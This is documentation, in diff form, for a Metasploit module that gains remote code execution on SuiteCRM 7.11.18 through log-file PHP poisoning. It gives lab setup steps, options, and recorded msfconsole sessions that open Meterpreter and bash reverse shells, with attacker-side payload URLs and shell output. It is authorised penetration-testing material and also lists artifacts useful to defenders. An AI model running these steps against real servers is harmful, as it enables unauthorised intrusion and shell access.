|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +SuiteCRM versions 7.11.18 and below. https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_18 |
| 4 | + |
| 5 | +### Installation |
| 6 | +Installation: https://docs.suitecrm.com/admin/installation-guide/downloading-installing/ |
| 7 | + |
| 8 | +The fastest way to stand up a quick test instance is with docker. Bitnami hosts docker images and `docker-compose.yml` files. |
| 9 | + |
| 10 | +Docker installation: https://docs.docker.com/get-docker/ |
| 11 | + |
| 12 | +``` |
| 13 | +curl -sSL https://raw.githubusercontent.com/bitnami/bitnami-docker-suitecrm/master/docker-compose.yml > docker-compose.yml |
| 14 | +docker-compose up -d |
| 15 | +``` |
| 16 | + |
| 17 | +You'll just want to edit the docker-compose file to pull the 7.11.18 release before you run `docker-compose up -d`. Example `docker-compose.yml` below: |
| 18 | + |
| 19 | +``` |
| 20 | + suitecrm: |
| 21 | + image: docker.io/bitnami/suitecrm:7.11.18 |
| 22 | +``` |
| 23 | + |
| 24 | +## Verification Steps |
| 25 | +Example steps in this format (is also in the PR): |
| 26 | + |
| 27 | +1. Install the application |
| 28 | +2. Start msfconsole |
| 29 | +3. Do: `use exploit/linux/http/suitecrm_log_file_rce` |
| 30 | +4. Do: `set USER [username]` |
| 31 | +5. Do: `set PASS [password]` |
| 32 | +6. Do: `set RHOSTS [IP]` |
| 33 | +7. Do: `set SRVPORT [IP]` |
| 34 | +8. Do: `set LHOST [IP] ` |
| 35 | +9. Do: `exploit` |
| 36 | +10. You should get a shell. |
| 37 | + |
| 38 | +## Options |
| 39 | +### USER |
| 40 | +Username of a user with administrator access to the SuiteCRM instance |
| 41 | + |
| 42 | +### PASS |
| 43 | +Password of the user with administrator access to the SuiteCRM instance |
| 44 | + |
| 45 | +### TARGETURI |
| 46 | +The base path to SuiteCRM. The default is `/` |
| 47 | + |
| 48 | +### RESTORECONF |
| 49 | +Restore the system log file settings to the default value of `suitecrm.log`. Default value is `true` |
| 50 | + |
| 51 | +### LASTNAME |
| 52 | +Last name you'd like to set the admin user back to after running the exploit. Default is `admin`. |
| 53 | + |
| 54 | +### WRITABLEDIR |
| 55 | +Any writable directory for paylod to be written. Only used for targets `0` ( `x64 meterpreter` ) and `2` ( `x86 meterpreter` ) |
| 56 | + |
| 57 | +## Targets |
| 58 | +Default is `0` with a payload of `linux/x64/meterpreter_reverse_tcp` |
| 59 | +``` |
| 60 | +Exploit targets: |
| 61 | +
|
| 62 | + Id Name |
| 63 | + -- ---- |
| 64 | + 0 Linux (x64) |
| 65 | + 1 Linux (cmd) |
| 66 | +``` |
| 67 | +Currently, this supports |
| 68 | +* `linux/x64/meterpreter_reverse_tcp` |
| 69 | +* `cmd/unix/bash_reverse_tcp` |
| 70 | + |
| 71 | +There is some encoding/escaping on the php poisoning into the log file, so php code is limited. I would also presume an `x86` meterpreter would run fine, but I haven't tested it. I did test a `cmd/unix/bash_reverse_udp` and it worked fine. I would presume most `cmd` payloads will work contingent on the required tools being available on the victim machine. |
| 72 | + |
| 73 | +### Artifacts/IOC's |
| 74 | +Target 0 is going to leave a random, 8 character alphanumeric PHP file such as this |
| 75 | +``` |
| 76 | +ryl2bLse.pHp |
| 77 | +``` |
| 78 | +in the webroot and it will leave a random alphanumeric 8 character file in `WRITABLEDIR` (`/tmp` by default) similar to this |
| 79 | +``` |
| 80 | +uG0QjRbK |
| 81 | +``` |
| 82 | +Operators: keep an eye out for the last couple of lines of output |
| 83 | +``` |
| 84 | +[!] This exploit may require manual cleanup of 'eTHsm71W.pHp' on the target |
| 85 | +[!] This exploit may require manual cleanup of '/tmp/54N6HA1E' on the target |
| 86 | +``` |
| 87 | + |
| 88 | +## Scenarios |
| 89 | +### SuiteCRM 7.11.18 Check + Target 0 (linux x64 meterpreter) |
| 90 | +``` |
| 91 | +msf6 > use exploit/linux/http/suitecrm_log_file_rce |
| 92 | +[*] Using configured payload linux/x64/meterpreter_reverse_tcp |
| 93 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29 |
| 94 | +RHOSTS => 192.168.122.29 |
| 95 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin |
| 96 | +USER => admin |
| 97 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin |
| 98 | +PASS => admin |
| 99 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125 |
| 100 | +SRVHOST => 192.168.122.125 |
| 101 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125 |
| 102 | +LHOST => 192.168.122.125 |
| 103 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > check |
| 104 | +
|
| 105 | +[*] Authenticating as admin |
| 106 | +[+] Authenticated as: admin |
| 107 | +[+] admin has administrative rights. |
| 108 | +[+] SuiteCRM Version 7.11.18 |
| 109 | +[*] 192.168.122.29:80 - The target appears to be vulnerable. |
| 110 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit |
| 111 | +
|
| 112 | +[*] Started reverse TCP handler on 192.168.122.125:4444 |
| 113 | +[*] Using URL: http://192.168.122.125:8080/NzzKmKY |
| 114 | +[*] Authenticating as admin |
| 115 | +[+] Authenticated as: admin |
| 116 | +[+] admin has administrative rights. |
| 117 | +[*] Modifying systems setting file |
| 118 | +[*] Poisoning log file |
| 119 | +[*] Executing php code in log file: fxg8pi1C.pHp |
| 120 | +[+] 192.168.122.29:80 - Payload sent! |
| 121 | +[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500 |
| 122 | +[*] Restoring log file to default configuration |
| 123 | +[*] Server stopped. |
| 124 | +[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target |
| 125 | +[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target |
| 126 | +
|
| 127 | +meterpreter > getuid |
| 128 | +Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1) |
| 129 | +meterpreter > exit |
| 130 | +[*] Shutting down Meterpreter... |
| 131 | +
|
| 132 | +[*] 172.21.0.3 - Meterpreter session 1 closed. Reason: User exit |
| 133 | +``` |
| 134 | +### SuiteCRM 7.11.18 Check + Target 1 (Unix bash reverse TCP shell) |
| 135 | +This was run immediately after the previous scenario. Initialization is exactly the same. |
| 136 | +``` |
| 137 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i |
| 138 | +
|
| 139 | +Active sessions |
| 140 | +=============== |
| 141 | +
|
| 142 | +No active sessions. |
| 143 | +
|
| 144 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1 |
| 145 | +target => 1 |
| 146 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > run |
| 147 | +
|
| 148 | +[*] Started reverse TCP handler on 192.168.122.125:4444 |
| 149 | +[*] Using URL: http://192.168.122.125:8080/Kle8QoPV |
| 150 | +[*] Authenticating as admin |
| 151 | +[+] Authenticated as: admin |
| 152 | +[+] admin has administrative rights. |
| 153 | +[*] Modifying systems setting file |
| 154 | +[*] Poisoning log file |
| 155 | +[*] Executing php code in log file: 1cOyYGE3.pHp |
| 156 | +[+] 192.168.122.29:80 - Payload sent! |
| 157 | +[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500 |
| 158 | +[*] Restoring log file to default configuration |
| 159 | +[*] Server stopped. |
| 160 | +[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target |
| 161 | +
|
| 162 | +id |
| 163 | +uid=1(daemon) gid=1(daemon) groups=1(daemon) |
| 164 | +whoami |
| 165 | +daemon |
| 166 | +exit |
| 167 | +[*] 192.168.122.29 - Command shell session 2 closed. |
| 168 | +
|
| 169 | +``` |
| 170 | + |
0 commit comments